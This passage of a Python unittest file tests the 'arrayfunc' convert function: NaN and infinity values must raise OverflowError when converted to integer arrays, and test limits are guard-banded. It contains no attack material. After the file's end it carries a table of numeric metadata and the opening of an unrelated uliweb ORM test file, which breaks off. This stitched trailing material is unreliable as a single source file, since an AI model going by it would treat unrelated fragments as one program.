        """Test convert for parameters in array code d - Second parameter missing.
        """
        # Bug fix: the original called convert() with no arguments at all,
        # duplicating test_convert_params_05 instead of exercising a missing
        # second parameter.
        data = array.array(self.TypeCode, itertools.repeat(0, 100))
        with self.assertRaises(TypeError):
            arrayfunc.convert(data)

    ########################################################
    def test_convert_params_07(self):
        """Test convert for parameters in array code d - Too many parameters.
        """
        outputtest = 'b'
        testvals = TestData.TestLimits(self.TypeCode, outputtest)
        data = array.array(self.TypeCode, testvals)
        dataout = array.array(outputtest, itertools.repeat(0, len(data)))
        with self.assertRaises(TypeError):
            arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_intnonfinite_to_b_from_f(unittest.TestCase):
    """Test convert function for nan, inf, or -inf to integer.
    intnonfinitetesttemplate
    """

    ########################################################
    def _expect_overflow(self, nonfinval):
        """Converting an 'f' array filled with the non-finite value
        'nonfinval' into a 'b' array must raise OverflowError."""
        data = array.array('f', [nonfinval] * 100)
        dataout = array.array('b', itertools.repeat(0, len(data)))
        with self.assertRaises(OverflowError):
            arrayfunc.convert(data, dataout)

    ########################################################
    def test_convert_nonfinite_f_b_01(self):
        """Test convert floating point nan to array code b from array code f.
        """
        self._expect_overflow(math.nan)

    ########################################################
    def test_convert_inf_f_b_02(self):
        """Test convert floating point inf to array code b from array code f.
        """
        self._expect_overflow(math.inf)

    ########################################################
    def test_convert_ninf_f_b_03(self):
        """Test convert floating point -inf to array code b from array code f.
        """
        self._expect_overflow(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_b_from_d(unittest.TestCase):
    """Test convert function for nan, inf, or -inf to integer.
    intnonfinitetesttemplate
    """

    ########################################################
    def _expect_overflow(self, nonfinval):
        """Converting a 'd' array filled with the non-finite value
        'nonfinval' into a 'b' array must raise OverflowError."""
        data = array.array('d', [nonfinval] * 100)
        dataout = array.array('b', itertools.repeat(0, len(data)))
        with self.assertRaises(OverflowError):
            arrayfunc.convert(data, dataout)

    ########################################################
    def test_convert_nonfinite_d_b_01(self):
        """Test convert floating point nan to array code b from array code d.
        """
        self._expect_overflow(math.nan)

    ########################################################
    def test_convert_inf_d_b_02(self):
        """Test convert floating point inf to array code b from array code d.
        """
        self._expect_overflow(math.inf)

    ########################################################
    def test_convert_ninf_d_b_03(self):
        """Test convert floating point -inf to array code b from array code d.
        """
        self._expect_overflow(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_B_from_f(unittest.TestCase):
    """Test convert function for nan, inf, or -inf to integer.
    intnonfinitetesttemplate
    """

    ########################################################
    def _expect_overflow(self, nonfinval):
        """Converting an 'f' array filled with the non-finite value
        'nonfinval' into a 'B' array must raise OverflowError."""
        data = array.array('f', [nonfinval] * 100)
        dataout = array.array('B', itertools.repeat(0, len(data)))
        with self.assertRaises(OverflowError):
            arrayfunc.convert(data, dataout)

    ########################################################
    def test_convert_nonfinite_f_B_01(self):
        """Test convert floating point nan to array code B from array code f.
        """
        self._expect_overflow(math.nan)

    ########################################################
    def test_convert_inf_f_B_02(self):
        """Test convert floating point inf to array code B from array code f.
        """
        self._expect_overflow(math.inf)

    ########################################################
    def test_convert_ninf_f_B_03(self):
        """Test convert floating point -inf to array code B from array code f.
        """
        self._expect_overflow(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_B_from_d(unittest.TestCase):
    """Test convert function for nan, inf, or -inf to integer.
    intnonfinitetesttemplate
    """

    ########################################################
    def _expect_overflow(self, nonfinval):
        """Converting a 'd' array filled with the non-finite value
        'nonfinval' into a 'B' array must raise OverflowError."""
        data = array.array('d', [nonfinval] * 100)
        dataout = array.array('B', itertools.repeat(0, len(data)))
        with self.assertRaises(OverflowError):
            arrayfunc.convert(data, dataout)

    ########################################################
    def test_convert_nonfinite_d_B_01(self):
        """Test convert floating point nan to array code B from array code d.
        """
        self._expect_overflow(math.nan)

    ########################################################
    def test_convert_inf_d_B_02(self):
        """Test convert floating point inf to array code B from array code d.
        """
        self._expect_overflow(math.inf)

    ########################################################
    def test_convert_ninf_d_B_03(self):
        """Test convert floating point -inf to array code B from array code d.
        """
        self._expect_overflow(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_h_from_f(unittest.TestCase):
    """Test convert function for nan, inf, or -inf to integer.
    intnonfinitetesttemplate
    """

    ########################################################
    def _expect_overflow(self, nonfinval):
        """Converting an 'f' array filled with the non-finite value
        'nonfinval' into an 'h' array must raise OverflowError."""
        data = array.array('f', [nonfinval] * 100)
        dataout = array.array('h', itertools.repeat(0, len(data)))
        with self.assertRaises(OverflowError):
            arrayfunc.convert(data, dataout)

    ########################################################
    def test_convert_nonfinite_f_h_01(self):
        """Test convert floating point nan to array code h from array code f.
        """
        self._expect_overflow(math.nan)

    ########################################################
    def test_convert_inf_f_h_02(self):
        """Test convert floating point inf to array code h from array code f.
        """
        self._expect_overflow(math.inf)

    ########################################################
    def test_convert_ninf_f_h_03(self):
        """Test convert floating point -inf to array code h from array code f.
        """
        self._expect_overflow(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_h_from_d(unittest.TestCase):
    """Test convert function for nan, inf, or -inf to integer.
    intnonfinitetesttemplate
    """

    ########################################################
    def _expect_overflow(self, nonfinval):
        """Converting a 'd' array filled with the non-finite value
        'nonfinval' into an 'h' array must raise OverflowError."""
        data = array.array('d', [nonfinval] * 100)
        dataout = array.array('h', itertools.repeat(0, len(data)))
        with self.assertRaises(OverflowError):
            arrayfunc.convert(data, dataout)

    ########################################################
    def test_convert_nonfinite_d_h_01(self):
        """Test convert floating point nan to array code h from array code d.
        """
        self._expect_overflow(math.nan)

    ########################################################
    def test_convert_inf_d_h_02(self):
        """Test convert floating point inf to array code h from array code d.
        """
        self._expect_overflow(math.inf)

    ########################################################
    def test_convert_ninf_d_h_03(self):
        """Test convert floating point -inf to array code h from array code d.
        """
        self._expect_overflow(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_H_from_f(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'f' to
		integer array code 'H' must raise OverflowError.
		"""
		srcarray = array.array('f', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('H', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_f_H_01(self):
		"""Test convert floating point nan to array code H from array code f.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_f_H_02(self):
		"""Test convert floating point inf to array code H from array code f.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_f_H_03(self):
		"""Test convert floating point -inf to array code H from array code f.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_H_from_d(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'd' to
		integer array code 'H' must raise OverflowError.
		"""
		srcarray = array.array('d', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('H', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_d_H_01(self):
		"""Test convert floating point nan to array code H from array code d.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_d_H_02(self):
		"""Test convert floating point inf to array code H from array code d.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_d_H_03(self):
		"""Test convert floating point -inf to array code H from array code d.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_i_from_f(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'f' to
		integer array code 'i' must raise OverflowError.
		"""
		srcarray = array.array('f', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('i', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_f_i_01(self):
		"""Test convert floating point nan to array code i from array code f.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_f_i_02(self):
		"""Test convert floating point inf to array code i from array code f.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_f_i_03(self):
		"""Test convert floating point -inf to array code i from array code f.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_i_from_d(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'd' to
		integer array code 'i' must raise OverflowError.
		"""
		srcarray = array.array('d', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('i', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_d_i_01(self):
		"""Test convert floating point nan to array code i from array code d.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_d_i_02(self):
		"""Test convert floating point inf to array code i from array code d.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_d_i_03(self):
		"""Test convert floating point -inf to array code i from array code d.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_I_from_f(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'f' to
		integer array code 'I' must raise OverflowError.
		"""
		srcarray = array.array('f', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('I', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_f_I_01(self):
		"""Test convert floating point nan to array code I from array code f.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_f_I_02(self):
		"""Test convert floating point inf to array code I from array code f.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_f_I_03(self):
		"""Test convert floating point -inf to array code I from array code f.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_I_from_d(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'd' to
		integer array code 'I' must raise OverflowError.
		"""
		srcarray = array.array('d', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('I', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_d_I_01(self):
		"""Test convert floating point nan to array code I from array code d.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_d_I_02(self):
		"""Test convert floating point inf to array code I from array code d.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_d_I_03(self):
		"""Test convert floating point -inf to array code I from array code d.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_l_from_f(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'f' to
		integer array code 'l' must raise OverflowError.
		"""
		srcarray = array.array('f', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('l', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_f_l_01(self):
		"""Test convert floating point nan to array code l from array code f.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_f_l_02(self):
		"""Test convert floating point inf to array code l from array code f.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_f_l_03(self):
		"""Test convert floating point -inf to array code l from array code f.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_l_from_d(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'd' to
		integer array code 'l' must raise OverflowError.
		"""
		srcarray = array.array('d', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('l', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_d_l_01(self):
		"""Test convert floating point nan to array code l from array code d.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_d_l_02(self):
		"""Test convert floating point inf to array code l from array code d.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_d_l_03(self):
		"""Test convert floating point -inf to array code l from array code d.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_L_from_f(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'f' to
		integer array code 'L' must raise OverflowError.
		"""
		srcarray = array.array('f', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('L', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_f_L_01(self):
		"""Test convert floating point nan to array code L from array code f.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_f_L_02(self):
		"""Test convert floating point inf to array code L from array code f.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_f_L_03(self):
		"""Test convert floating point -inf to array code L from array code f.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_L_from_d(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'd' to
		integer array code 'L' must raise OverflowError.
		"""
		srcarray = array.array('d', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('L', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_d_L_01(self):
		"""Test convert floating point nan to array code L from array code d.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_d_L_02(self):
		"""Test convert floating point inf to array code L from array code d.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_d_L_03(self):
		"""Test convert floating point -inf to array code L from array code d.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_q_from_f(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'f' to
		integer array code 'q' must raise OverflowError.
		"""
		srcarray = array.array('f', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('q', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_f_q_01(self):
		"""Test convert floating point nan to array code q from array code f.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_f_q_02(self):
		"""Test convert floating point inf to array code q from array code f.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_f_q_03(self):
		"""Test convert floating point -inf to array code q from array code f.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_q_from_d(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'd' to
		integer array code 'q' must raise OverflowError.
		"""
		srcarray = array.array('d', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('q', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_d_q_01(self):
		"""Test convert floating point nan to array code q from array code d.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_d_q_02(self):
		"""Test convert floating point inf to array code q from array code d.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_d_q_03(self):
		"""Test convert floating point -inf to array code q from array code d.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_Q_from_f(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'f' to
		integer array code 'Q' must raise OverflowError.
		"""
		srcarray = array.array('f', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('Q', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_f_Q_01(self):
		"""Test convert floating point nan to array code Q from array code f.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_f_Q_02(self):
		"""Test convert floating point inf to array code Q from array code f.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_f_Q_03(self):
		"""Test convert floating point -inf to array code Q from array code f.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_intnonfinite_to_Q_from_d(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf to integer.
	intnonfinitetesttemplate
	"""

	########################################################
	def _convertraises(self, nonfinitevalue):
		"""Converting 100 copies of nonfinitevalue from array code 'd' to
		integer array code 'Q' must raise OverflowError.
		"""
		srcarray = array.array('d', itertools.repeat(nonfinitevalue, 100))
		destarray = array.array('Q', [0] * len(srcarray))
		self.assertRaises(OverflowError, arrayfunc.convert, srcarray, destarray)

	########################################################
	def test_convert_nonfinite_d_Q_01(self):
		"""Test convert floating point nan to array code Q from array code d.
		"""
		self._convertraises(math.nan)

	########################################################
	def test_convert_inf_d_Q_02(self):
		"""Test convert floating point inf to array code Q from array code d.
		"""
		self._convertraises(math.inf)

	########################################################
	def test_convert_ninf_d_Q_03(self):
		"""Test convert floating point -inf to array code Q from array code d.
		"""
		self._convertraises(-math.inf)
##############################################################################
##############################################################################
class convert_floatnonfinite_float(unittest.TestCase):
	"""Test convert function for nan, inf, or -inf between floating point types.
	floatnonfinitetesttemplate
	"""

	##############################################################################
	def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
		"""Patched into assertEqual so the floating point special values
		NaN, Inf, and -Inf can be tested (NaN never compares equal with '==').
		"""
		# Two NaNs count as equal for test purposes.
		if math.isnan(dataoutitem) and math.isnan(expecteditem):
			return
		# Everything else is compared approximately.
		if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
			raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))

	########################################################
	def setUp(self):
		"""Initialise.
		"""
		self.addTypeEqualityFunc(float, self.FloatassertEqual)

	########################################################
	def _checknan(self, srccode, destcode):
		"""Convert an array of NaN values between float types. No error may
		be raised and every output element must still be NaN.
		"""
		srcarray = array.array(srccode, itertools.repeat(math.nan, 100))
		destarray = array.array(destcode, [0.0] * len(srcarray))
		# There should be no error.
		arrayfunc.convert(srcarray, destarray)
		self.assertTrue(all(math.isnan(x) for x in destarray))

	########################################################
	def _checkinf(self, srccode, destcode, infvalue):
		"""Convert an array of infvalue (inf or -inf) between float types.
		No error may be raised and the output must equal an array of infvalue.
		"""
		srcarray = array.array(srccode, itertools.repeat(infvalue, 100))
		destarray = array.array(destcode, [0.0] * len(srcarray))
		expected = array.array(destcode, [infvalue] * len(srcarray))
		# There should be no error.
		arrayfunc.convert(srcarray, destarray)
		self.assertEqual(destarray, expected)

	########################################################
	def test_convert_nonfinite_f_d_01(self):
		"""Test convert floating point nan to array code d from array code f.
		"""
		self._checknan('f', 'd')

	########################################################
	def test_convert_nonfinite_d_f_02(self):
		"""Test convert floating point nan to array code f from array code d.
		"""
		self._checknan('d', 'f')

	########################################################
	def test_convert_inf_f_d_03(self):
		"""Test convert floating point inf to array code d from array code f.
		"""
		self._checkinf('f', 'd', math.inf)

	########################################################
	def test_convert_inf_d_f_04(self):
		"""Test convert floating point inf to array code f from array code d.
		"""
		self._checkinf('d', 'f', math.inf)

	########################################################
	def test_convert_ninf_f_d_05(self):
		"""Test convert floating point -inf to array code d from array code f.
		"""
		self._checkinf('f', 'd', -math.inf)

	########################################################
	def test_convert_ninf_d_f_06(self):
		"""Test convert floating point -inf to array code f from array code d.
		"""
		self._checkinf('d', 'f', -math.inf)
##############################################################################
from arrayfunc import arrayguardbands
##############################################################################
class testlimits:
	"""This calculates the test limits, including guard band values.

	Guard band values come from arrayfunc.arrayguardbands: for some array
	types the platform float type cannot exactly represent the integer
	extremes, so slightly narrowed limits are used instead of the raw ones.
	"""

	########################################################
	def __init__(self):
		arraycodes = 'bBhHiIlLqQfd'
		limits = arrayfunc.arraylimits
		guards = arrayfunc.arrayguardbands

		# Min value for when the source is a 'd' (double) array.
		self.source_d_min = {
			'b' : limits.b_min,
			'B' : limits.B_min,
			'h' : limits.h_min,
			'H' : limits.H_min,
			'i' : limits.i_min,
			'I' : limits.I_min,
			'l' : guards.LONG_MIN_GUARD_D,
			'L' : 0,
			'q' : guards.LLONG_MIN_GUARD_D,
			'Q' : 0,
			'f' : limits.f_min,
			'd' : limits.d_min,
		}

		# Max value for when the source is a 'd' (double) array.
		self.source_d_max = {
			'b' : limits.b_max,
			'B' : limits.B_max,
			'h' : limits.h_max,
			'H' : limits.H_max,
			'i' : limits.i_max,
			'I' : limits.I_max,
			'l' : guards.LONG_MAX_GUARD_D,
			'L' : guards.ULONG_MAX_GUARD_D,
			'q' : guards.LLONG_MAX_GUARD_D,
			'Q' : guards.ULLONG_MAX_GUARD_D,
			'f' : limits.f_max,
			'd' : limits.d_max,
		}

		# Min value for when the source is a 'f' (float) array.
		# NOTE: 'd' deliberately maps to the float ('f') limit here, since
		# the source values themselves are limited to float range.
		self.source_f_min = {
			'b' : limits.b_min,
			'B' : limits.B_min,
			'h' : limits.h_min,
			'H' : limits.H_min,
			'i' : guards.INT_MIN_GUARD_F,
			'I' : limits.I_min,
			'l' : guards.LONG_MIN_GUARD_F,
			'L' : 0,
			'q' : guards.LLONG_MIN_GUARD_F,
			'Q' : 0,
			'f' : limits.f_min,
			'd' : limits.f_min,
		}

		# Max value for when the source is a 'f' (float) array.
		self.source_f_max = {
			'b' : limits.b_max,
			'B' : limits.B_max,
			'h' : limits.h_max,
			'H' : limits.H_max,
			'i' : guards.INT_MAX_GUARD_F,
			'I' : guards.UINT_MAX_GUARD_F,
			'l' : guards.LONG_MAX_GUARD_F,
			'L' : guards.ULONG_MAX_GUARD_F,
			'q' : guards.LLONG_MAX_GUARD_F,
			'Q' : guards.ULLONG_MAX_GUARD_F,
			'f' : limits.f_max,
			'd' : limits.f_max,
		}

		# The maximum and minimum values for selected array types, taken
		# directly from arrayfunc.arraylimits without guard banding.
		self.TestLimMax = {code : getattr(limits, code + '_max') for code in arraycodes}
		self.TestLimMin = {code : getattr(limits, code + '_min') for code in arraycodes}

	########################################################
	def arrayguardbands(self, sourcetype, destcode, limtype):
		"""Return the platform limits for each array type.
		limtype must be 'min' or 'max'; anything else prints a message
		and returns None.
		"""
		if limtype not in ('min', 'max'):
			print('Invalid limit type', limtype)
			return None
		if sourcetype == 'd':
			table = self.source_d_min if limtype == 'min' else self.source_d_max
		else:
			table = self.source_f_min if limtype == 'min' else self.source_f_max
		return table[destcode]

	########################################################
	def TestLimits(self, datacode, dataoutcode):
		"""Find a set of test values which are compatible with both input and output arrays.
		Returns a list of data to use for test values.
		"""
		floatcodes = ('f', 'd')

		# Float source converting to an integer destination needs the
		# guard banded limits; all other combinations use the raw limits.
		if (datacode in floatcodes) and (dataoutcode not in floatcodes):
			dataoutmax = self.arrayguardbands(datacode, dataoutcode, 'max')
			dataoutmin = self.arrayguardbands(datacode, dataoutcode, 'min')
		else:
			dataoutmax = self.TestLimMax[dataoutcode]
			dataoutmin = self.TestLimMin[dataoutcode]

		datamax = self.TestLimMax[datacode]
		datamin = self.TestLimMin[datacode]

		# Make sure the data fits within the smallest range.
		maxval = min(datamax, dataoutmax)
		minval = max(datamin, dataoutmin)

		spread = int(maxval) - int(minval)
		step = max(spread // 512, 1)

		# Source and destination are integers, then use the full data range.
		if (datacode not in floatcodes) and (dataoutcode not in floatcodes):
			return list(range(minval, maxval + 1, step))

		# Either the source or destination are floating point: take a dense
		# run around zero, then pin the end points to the true extremes when
		# the range is wide enough.
		tmpmin = max(minval, -512)
		tmpmax = min(maxval, 511)
		longdata = list(range(tmpmin, tmpmax + 1, 1))
		if spread > 1024:
			longdata[0] = minval
			longdata[-1] = maxval

		# Make sure the data is in the expected format.
		if datacode in floatcodes:
			return [float(x) for x in longdata]
		return [int(x) for x in longdata]
# Calculate test limits.
# Shared module-level instance; the test cases use it to derive value ranges.
TestData = testlimits()
##############################################################################
##############################################################################
if __name__ == '__main__':
	# The '-l' flag is a local extension used to send the test results to a
	# log file instead of the console. It must be stripped from sys.argv
	# before unittest parses the arguments, or unittest will reject it.
	if '-l' in sys.argv:
		sys.argv.remove('-l')
		with open('af_unittest.txt', 'a') as f:
			f.write('\n\n')
			f.write('convert\n\n')
			unittest.main(testRunner=unittest.TextTestRunner(f))
	else:
		unittest.main()
##############################################################################
| 32.316366
| 91
| 0.606373
| 19,392
| 173,959
| 5.369121
| 0.017378
| 0.066982
| 0.041146
| 0.055783
| 0.975893
| 0.97499
| 0.96965
| 0.969074
| 0.967806
| 0.966845
| 0
| 0.010542
| 0.138458
| 173,959
| 5,382
| 92
| 32.322371
| 0.684166
| 0.234256
| 0
| 0.910127
| 0
| 0
| 0.006176
| 0
| 0
| 0
| 0
| 0
| 0.145148
| 1
| 0.146414
| false
| 0.005485
| 0.004219
| 0
| 0.173418
| 0.000422
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc8e03306ef5360edcf2bf9b7ee7ec4a98ed0eca
| 173
|
py
|
Python
|
neurolab/optimization/metric/__init__.py
|
udday2014/HebbianLearning
|
e0d17e53e3db8ce54b8fdd901702d2d6e0633732
|
[
"MIT"
] | 6
|
2020-01-08T05:36:09.000Z
|
2022-02-09T21:07:04.000Z
|
neurolab/optimization/metric/__init__.py
|
udday2014/HebbianLearning
|
e0d17e53e3db8ce54b8fdd901702d2d6e0633732
|
[
"MIT"
] | null | null | null |
neurolab/optimization/metric/__init__.py
|
udday2014/HebbianLearning
|
e0d17e53e3db8ce54b8fdd901702d2d6e0633732
|
[
"MIT"
] | 1
|
2021-09-11T08:12:29.000Z
|
2021-09-11T08:12:29.000Z
|
from .crossent import *
from .mse import *
from .acc import *
from .topkacc import *
from .prec import *
from .elbo import *
from .crossent_elbo import *
from .prog import *
| 21.625
| 28
| 0.728324
| 25
| 173
| 5
| 0.36
| 0.56
| 0.224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.179191
| 173
| 8
| 29
| 21.625
| 0.880282
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bcec9d1906ca1a2f459f40329aafeccb06ab7a00
| 13,452
|
py
|
Python
|
test/test_orm_extapp.py
|
timgates42/uliweb
|
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
|
[
"BSD-2-Clause"
] | 202
|
2015-01-12T08:10:48.000Z
|
2021-11-08T09:04:32.000Z
|
test/test_orm_extapp.py
|
timgates42/uliweb
|
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
|
[
"BSD-2-Clause"
] | 30
|
2015-01-01T09:07:17.000Z
|
2021-06-03T12:58:45.000Z
|
test/test_orm_extapp.py
|
timgates42/uliweb
|
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
|
[
"BSD-2-Clause"
] | 58
|
2015-01-12T03:28:54.000Z
|
2022-01-14T01:58:08.000Z
|
import os
from uliweb import manage
from uliweb.orm import *
import uliweb.orm as orm
from uliweb.manage import make_simple_application
os.chdir('test_orm_ext')
if os.path.exists('database.db'):
os.remove('database.db')
manage.call('uliweb syncdb -v')
def test_extend_model():
"""
>>> app = make_simple_application(project_dir='.', reuse=False)
>>> U = get_model('user')
>>> U.properties.keys()
['username', 'age', 'id']
>>> U1 = get_model('user1')
>>> U1.properties.keys()
['age', 'id']
"""
def test_dynamic_extend_model_1():
"""
>>> app = make_simple_application(project_dir='.', reuse=False)
>>> fields = [
... {'name':'year', 'type':'int'}
... ]
>>> U = create_model('user2', fields)
>>> print U.properties.keys()
['id', 'year']
"""
def test_dynamic_extend_model_2():
"""
